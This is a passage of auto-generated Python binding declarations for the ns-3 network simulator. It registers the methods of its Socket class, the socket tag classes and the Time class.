cls.add_method('GetSockName',
'int',
[param('ns3::Address &', 'address')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): ns3::Socket::SocketType ns3::Socket::GetSocketType() const [member function]
cls.add_method('GetSocketType',
'ns3::Socket::SocketType',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::Socket::GetTxAvailable() const [member function]
cls.add_method('GetTxAvailable',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::Socket::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): bool ns3::Socket::IsIpRecvTos() const [member function]
cls.add_method('IsIpRecvTos',
'bool',
[],
is_const=True)
## socket.h (module 'network'): bool ns3::Socket::IsIpRecvTtl() const [member function]
cls.add_method('IsIpRecvTtl',
'bool',
[],
is_const=True)
## socket.h (module 'network'): bool ns3::Socket::IsIpv6RecvHopLimit() const [member function]
cls.add_method('IsIpv6RecvHopLimit',
'bool',
[],
is_const=True)
## socket.h (module 'network'): bool ns3::Socket::IsIpv6RecvTclass() const [member function]
cls.add_method('IsIpv6RecvTclass',
'bool',
[],
is_const=True)
## socket.h (module 'network'): bool ns3::Socket::IsRecvPktInfo() const [member function]
cls.add_method('IsRecvPktInfo',
'bool',
[],
is_const=True)
## socket.h (module 'network'): int ns3::Socket::Listen() [member function]
cls.add_method('Listen',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv(uint32_t maxSize, uint32_t flags) [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv() [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[])
## socket.h (module 'network'): int ns3::Socket::Recv(uint8_t * buf, uint32_t size, uint32_t flags) [member function]
cls.add_method('Recv',
'int',
[param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('ns3::Address &', 'fromAddress')])
## socket.h (module 'network'): int ns3::Socket::RecvFrom(uint8_t * buf, uint32_t size, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'int',
[param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')])
## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p')])
## socket.h (module 'network'): int ns3::Socket::Send(uint8_t const * buf, uint32_t size, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
## socket.h (module 'network'): int ns3::Socket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function]
cls.add_method('SendTo',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::SendTo(uint8_t const * buf, uint32_t size, uint32_t flags, ns3::Address const & address) [member function]
cls.add_method('SendTo',
'int',
[param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address const &', 'address')])
## socket.h (module 'network'): void ns3::Socket::SetAcceptCallback(ns3::Callback<bool, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionRequest, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> newConnectionCreated) [member function]
cls.add_method('SetAcceptCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionRequest'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'newConnectionCreated')])
## socket.h (module 'network'): bool ns3::Socket::SetAllowBroadcast(bool allowBroadcast) [member function]
cls.add_method('SetAllowBroadcast',
'bool',
[param('bool', 'allowBroadcast')],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::SetCloseCallbacks(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> normalClose, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> errorClose) [member function]
cls.add_method('SetCloseCallbacks',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'normalClose'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'errorClose')])
## socket.h (module 'network'): void ns3::Socket::SetConnectCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionSucceeded, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionFailed) [member function]
cls.add_method('SetConnectCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionSucceeded'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionFailed')])
## socket.h (module 'network'): void ns3::Socket::SetDataSentCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> dataSent) [member function]
cls.add_method('SetDataSentCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'dataSent')])
## socket.h (module 'network'): void ns3::Socket::SetIpRecvTos(bool ipv4RecvTos) [member function]
cls.add_method('SetIpRecvTos',
'void',
[param('bool', 'ipv4RecvTos')])
## socket.h (module 'network'): void ns3::Socket::SetIpRecvTtl(bool ipv4RecvTtl) [member function]
cls.add_method('SetIpRecvTtl',
'void',
[param('bool', 'ipv4RecvTtl')])
## socket.h (module 'network'): void ns3::Socket::SetIpTos(uint8_t ipTos) [member function]
cls.add_method('SetIpTos',
'void',
[param('uint8_t', 'ipTos')])
## socket.h (module 'network'): void ns3::Socket::SetIpTtl(uint8_t ipTtl) [member function]
cls.add_method('SetIpTtl',
'void',
[param('uint8_t', 'ipTtl')],
is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::SetIpv6HopLimit(uint8_t ipHopLimit) [member function]
cls.add_method('SetIpv6HopLimit',
'void',
[param('uint8_t', 'ipHopLimit')],
is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::SetIpv6RecvHopLimit(bool ipv6RecvHopLimit) [member function]
cls.add_method('SetIpv6RecvHopLimit',
'void',
[param('bool', 'ipv6RecvHopLimit')])
## socket.h (module 'network'): void ns3::Socket::SetIpv6RecvTclass(bool ipv6RecvTclass) [member function]
cls.add_method('SetIpv6RecvTclass',
'void',
[param('bool', 'ipv6RecvTclass')])
## socket.h (module 'network'): void ns3::Socket::SetIpv6Tclass(int ipTclass) [member function]
cls.add_method('SetIpv6Tclass',
'void',
[param('int', 'ipTclass')])
## socket.h (module 'network'): void ns3::Socket::SetRecvCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> arg0) [member function]
cls.add_method('SetRecvCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'arg0')])
## socket.h (module 'network'): void ns3::Socket::SetRecvPktInfo(bool flag) [member function]
cls.add_method('SetRecvPktInfo',
'void',
[param('bool', 'flag')])
## socket.h (module 'network'): void ns3::Socket::SetSendCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> sendCb) [member function]
cls.add_method('SetSendCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'sendCb')])
## socket.h (module 'network'): int ns3::Socket::ShutdownRecv() [member function]
cls.add_method('ShutdownRecv',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): int ns3::Socket::ShutdownSend() [member function]
cls.add_method('ShutdownSend',
'int',
[],
is_pure_virtual=True, is_virtual=True)
## socket.h (module 'network'): void ns3::Socket::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## socket.h (module 'network'): bool ns3::Socket::IsManualIpTos() const [member function]
cls.add_method('IsManualIpTos',
'bool',
[],
is_const=True, visibility='protected')
## socket.h (module 'network'): bool ns3::Socket::IsManualIpTtl() const [member function]
cls.add_method('IsManualIpTtl',
'bool',
[],
is_const=True, visibility='protected')
## socket.h (module 'network'): bool ns3::Socket::IsManualIpv6HopLimit() const [member function]
cls.add_method('IsManualIpv6HopLimit',
'bool',
[],
is_const=True, visibility='protected')
## socket.h (module 'network'): bool ns3::Socket::IsManualIpv6Tclass() const [member function]
cls.add_method('IsManualIpv6Tclass',
'bool',
[],
is_const=True, visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyConnectionFailed() [member function]
cls.add_method('NotifyConnectionFailed',
'void',
[],
visibility='protected')
## socket.h (module 'network'): bool ns3::Socket::NotifyConnectionRequest(ns3::Address const & from) [member function]
cls.add_method('NotifyConnectionRequest',
'bool',
[param('ns3::Address const &', 'from')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyConnectionSucceeded() [member function]
cls.add_method('NotifyConnectionSucceeded',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyDataRecv() [member function]
cls.add_method('NotifyDataRecv',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyDataSent(uint32_t size) [member function]
cls.add_method('NotifyDataSent',
'void',
[param('uint32_t', 'size')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyErrorClose() [member function]
cls.add_method('NotifyErrorClose',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyNewConnectionCreated(ns3::Ptr<ns3::Socket> socket, ns3::Address const & from) [member function]
cls.add_method('NotifyNewConnectionCreated',
'void',
[param('ns3::Ptr< ns3::Socket >', 'socket'), param('ns3::Address const &', 'from')],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifyNormalClose() [member function]
cls.add_method('NotifyNormalClose',
'void',
[],
visibility='protected')
## socket.h (module 'network'): void ns3::Socket::NotifySend(uint32_t spaceAvailable) [member function]
cls.add_method('NotifySend',
'void',
[param('uint32_t', 'spaceAvailable')],
visibility='protected')
return
def register_Ns3SocketAddressTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag(ns3::SocketAddressTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketAddressTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketAddressTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::Address ns3::SocketAddressTag::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_const=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketAddressTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketAddressTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketAddressTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketAddressTag::SetAddress(ns3::Address addr) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'addr')])
return
def register_Ns3SocketIpTosTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketIpTosTag::SocketIpTosTag(ns3::SocketIpTosTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketIpTosTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketIpTosTag::SocketIpTosTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketIpTosTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTosTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketIpTosTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::SocketIpTosTag::GetTos() const [member function]
cls.add_method('GetTos',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTosTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketIpTosTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTosTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTosTag::SetTos(uint8_t tos) [member function]
cls.add_method('SetTos',
'void',
[param('uint8_t', 'tos')])
return
def register_Ns3SocketIpTtlTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag(ns3::SocketIpTtlTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketIpTtlTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTtlTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketIpTtlTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::SocketIpTtlTag::GetTtl() const [member function]
cls.add_method('GetTtl',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTtlTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpTtlTag::SetTtl(uint8_t ttl) [member function]
cls.add_method('SetTtl',
'void',
[param('uint8_t', 'ttl')])
return
def register_Ns3SocketIpv6HopLimitTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag::SocketIpv6HopLimitTag(ns3::SocketIpv6HopLimitTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketIpv6HopLimitTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag::SocketIpv6HopLimitTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::SocketIpv6HopLimitTag::GetHopLimit() const [member function]
cls.add_method('GetHopLimit',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketIpv6HopLimitTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketIpv6HopLimitTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpv6HopLimitTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::SetHopLimit(uint8_t hopLimit) [member function]
cls.add_method('SetHopLimit',
'void',
[param('uint8_t', 'hopLimit')])
return
def register_Ns3SocketIpv6TclassTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketIpv6TclassTag::SocketIpv6TclassTag(ns3::SocketIpv6TclassTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketIpv6TclassTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketIpv6TclassTag::SocketIpv6TclassTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): ns3::TypeId ns3::SocketIpv6TclassTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketIpv6TclassTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint8_t ns3::SocketIpv6TclassTag::GetTclass() const [member function]
cls.add_method('GetTclass',
'uint8_t',
[],
is_const=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpv6TclassTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::SetTclass(uint8_t tclass) [member function]
cls.add_method('SetTclass',
'void',
[param('uint8_t', 'tclass')])
return
def register_Ns3SocketSetDontFragmentTag_methods(root_module, cls):
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag(ns3::SocketSetDontFragmentTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::SocketSetDontFragmentTag const &', 'arg0')])
## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag() [constructor]
cls.add_constructor([])
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Deserialize(ns3::TagBuffer i) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_virtual=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Disable() [member function]
cls.add_method('Disable',
'void',
[])
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Enable() [member function]
cls.add_method('Enable',
'void',
[])
## socket.h (module 'network'): ns3::TypeId ns3::SocketSetDontFragmentTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): uint32_t ns3::SocketSetDontFragmentTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## socket.h (module 'network'): static ns3::TypeId ns3::SocketSetDontFragmentTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## socket.h (module 'network'): bool ns3::SocketSetDontFragmentTag::IsEnabled() const [member function]
cls.add_method('IsEnabled',
'bool',
[],
is_const=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Serialize(ns3::TagBuffer i) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'i')],
is_const=True, is_virtual=True)
return
def register_Ns3Time_methods(root_module, cls):
cls.add_binary_numeric_operator('+', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::Time'], root_module['ns3::Time'], param('ns3::Time const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('+=', param('ns3::Time const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::Time const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## nstime.h (module 'core'): ns3::Time::Time() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::Time::Time(ns3::Time const & o) [copy constructor]
cls.add_constructor([param('ns3::Time const &', 'o')])
## nstime.h (module 'core'): ns3::Time::Time(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## nstime.h (module 'core'): ns3::Time::Time(std::string const & s) [constructor]
cls.add_constructor([param('std::string const &', 's')])
## nstime.h (module 'core'): ns3::Time::Time(ns3::int64x64_t const & value) [constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
## nstime.h (module 'core'): int ns3::Time::Compare(ns3::Time const & o) const [member function]
cls.add_method('Compare',
'int',
[param('ns3::Time const &', 'o')],
is_const=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & from, ns3::Time::Unit timeUnit) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::From(ns3::int64x64_t const & value) [member function]
cls.add_method('From',
'ns3::Time',
[param('ns3::int64x64_t const &', 'value')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromDouble(double value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromDouble',
'ns3::Time',
[param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::FromInteger(uint64_t value, ns3::Time::Unit timeUnit) [member function]
cls.add_method('FromInteger',
'ns3::Time',
[param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetFemtoSeconds() const [member function]
cls.add_method('GetFemtoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetInteger() const [member function]
cls.add_method('GetInteger',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMicroSeconds() const [member function]
cls.add_method('GetMicroSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetMilliSeconds() const [member function]
cls.add_method('GetMilliSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetNanoSeconds() const [member function]
cls.add_method('GetNanoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetPicoSeconds() const [member function]
cls.add_method('GetPicoSeconds',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time::Unit ns3::Time::GetResolution() [member function]
cls.add_method('GetResolution',
'ns3::Time::Unit',
[],
is_static=True)
## nstime.h (module 'core'): double ns3::Time::GetSeconds() const [member function]
cls.add_method('GetSeconds',
'double',
[],
is_const=True)
## nstime.h (module 'core'): int64_t ns3::Time::GetTimeStep() const [member function]
cls.add_method('GetTimeStep',
'int64_t',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsNegative() const [member function]
cls.add_method('IsNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsPositive() const [member function]
cls.add_method('IsPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyNegative() const [member function]
cls.add_method('IsStrictlyNegative',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsStrictlyPositive() const [member function]
cls.add_method('IsStrictlyPositive',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): bool ns3::Time::IsZero() const [member function]
cls.add_method('IsZero',
'bool',
[],
is_const=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::Max() [member function]
cls.add_method('Max',
'ns3::Time',
[],
is_static=True)
## nstime.h (module 'core'): static ns3::Time ns3::Time::Min() [member function]
cls.add_method('Min',
'ns3::Time',
[],
is_static=True)
## nstime.h (module 'core'): static void ns3::Time::SetResolution(ns3::Time::Unit resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time::Unit', 'resolution')],
is_static=True)
## nstime.h (module 'core'): static bool ns3::Time::StaticInit() [member function]
cls.add_method('StaticInit',
'bool',
[],
